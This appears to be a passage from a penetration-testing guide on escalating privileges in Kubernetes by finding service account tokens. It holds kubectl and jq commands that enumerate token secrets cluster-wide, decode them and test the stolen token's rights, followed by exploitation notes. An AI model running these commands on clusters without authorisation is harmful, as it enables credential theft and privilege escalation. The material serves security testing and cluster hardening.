Service accounts are identities, and their tokens are bearer credentials: whoever holds one acts as that account. Escalation is finding a token for a more privileged account, from a readable secret, a co-located pod's mount, or by minting one where you have rights over the account.
# Legacy token secrets (still present on older clusters)
kubectl get secrets -A -o json | jq -r '.items[]|select(.type=="kubernetes.io/service-account-token")|.metadata.namespace+"/"+.metadata.name'
kubectl get secret <sa-token-secret> -o jsonpath='{.data.token}' | base64 -d
# Use the token
kubectl --token=<token> auth can-i --list
Exploitation notes#
- Any readable secret of type
service-account-tokenis a ready identity; check what it can do before using it. - On newer clusters tokens are short-lived and projected, not stored in secrets, so prefer the TokenRequest API or a pod mount.
- Chain from a secret read granted by an Over-permissive role.